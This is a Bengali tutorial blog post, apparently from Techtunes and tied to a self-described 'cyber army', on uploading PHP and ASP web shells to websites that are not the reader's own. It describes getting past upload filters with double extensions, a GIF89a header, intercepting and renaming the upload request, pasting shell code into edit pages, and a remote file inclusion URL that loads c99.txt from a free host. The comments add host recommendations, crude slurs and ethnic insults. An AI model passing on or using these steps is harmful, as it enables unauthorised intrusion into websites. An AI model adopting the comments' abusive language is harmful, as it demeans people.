ADs by Techtunes ADs
ADs by Techtunes ADs

ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন …/….

প্রথম এ বলে নেই এটি একটি NFN (Not For Noobs) টিউটোরিয়াল । এটি বুঝতে হলে বেসিক হ্যাকিং জানা অত্যাবশ্যক । আমরা অনেক সময় ওয়েবসাইট এর অ্যাডমিন প্যানেল এ প্রবেশ করি এবং পি এইচ পি, এ এস পি , এ এস পি এক্স  ইত্যাদি  শেল আপলোড এর চেস্টা করি । কিন্তু দেখা যায় বিভিন্ন সমস্যা হয় । শেল আপলোড হয়না ... এন্টিভাইরাস ব্লক দেয় ইত্যাদি । অ্যাডমিন প্যানেল এ লগিন করার পর সহজেই আপলোড বাটন এর সাহায্যে শেল আপলোড দেয়া যায় । কিন্তু মাঝে মাঝে কিছু সমস্যা হতে পারে । তাই সহজ উপায় এ শেল আপলোড না হলে কিভাভে তাকে কাস্টোমাইজ করে আপলোড করা যায় তাই আপনাদেরকে বলব ।

ADs by Techtunes ADs

প্রথম পদ্ধতি

আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।

দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন

তৃতীয় পদ্ধতি

কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।

চতুর্থ পদ্ধতি

আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।

> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।

পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ......... আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল  কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।
ষষ্ঠ পদ্ধতি

RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, http://www.my3gb.com ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না

শেষ কথা

ADs by Techtunes ADs

আর অনেক পদ্ধতি আছে । আমি সেগুল আয়ত্তে আনতে পারলে শেয়ার করব । আজকে তো এগুলো বললাম পরের লেখায় joomla, wordpress, vbulletine এসব সাইট এ কিভাবে শেল আপলোড করতে হয় টা তুলে ধরব । আর বাংলাদেশ সাইবার আর্মি এর যে কোনও পর্যায় এর সদস্য বাদে অন্য কেউ লেখকের অনুমতি ছাড়া এটি কপি পেস্ট করবেন না ।

এরকম অনেক কিছু পাবেন > http://www.facebppk.com/CY133R
আর আমি আছি > http://www.facebook.com/II.45LAN.II
আল্লাহ হাফেয

ADs by Techtunes ADs
Level 0

আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 4 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

অনেক free hosting সাইটে শেল আপলোড দিলে এরা একাউন্ট ব্যান করে দেয়। তবে এর জন্য আমার মতে http://www.prozapoti.com এই সাইট টা বেটার। কারন এরা কখনই ব্যান করেনা।

ভাই শেল তো ভাইরাস …… করাটা স্বাভাবিক …… php হোস্টিং সাইট এ php শেল আপলোড দিলে খুব কম ই ব্লক হয়

Level 0

বাংলাদেশ সাইবার আর্মি (BCA) = বাইনচোদ সাইবার আর্মি

পুরা লেখাটাই ভারতের এক হ্যাকারের কপি করা, ভারতের হ্যাকারের লিংকঃ https://www.facebook.com/BACKTRACK.SLAX

Team Grey Hat এ 9 Apri এই লেখাগুলো PDF আকাড়ে প্রকাশ করে। প্রমান: https://www.facebook.com/groups/teamgreyhat/permalink/471249526277503/

আসল লেখার ডাউনলোড লিংকঃ
http://adf.ly/MZJ7z
password= i-HOS

বাংলাদেশ সাইবার আর্মি ——— শালার কপি পেষ্ট বাইনচোদ সাইবার আর্মি। থুথু মারি তোর মুখে !!!

    পেয়েছি একটা ইন্ডিয়ান জারজকে।নিজেদের তো যোগ্যতা নাই আবার বিসিএ কে গালাগালি করছে।ইন্ডিয়ানদের জাত খারাপ তা তাদের ভাষা দেখেই বোঝা যায়।আরে ছাগল ঐ ইন্ডিয়ান জোকারদের গ্রুপটাই এই লেখাটা চুরি করেছে।না ভুল বললাম,তুই ঐ জোকার গ্রুপের একটা জোকার,তুই কপি পেষ্ট করে বসিয়ে এথন বিসিএকে গালি দিচ্ছিস।হুহ,বিসিএর ইন্ডিয়ায় আক্রমনে তোরা ধ্বংস হয়ে যাস আর ম্যা ম্যা করতে থাকিস।তোদের হ্যাকার থুক্কু জোকারদের আবার কোন বা* যোগ্যতা আছে তাই তো বোঝা যায়।ভোদাই কোথাকার।যা ফোট :/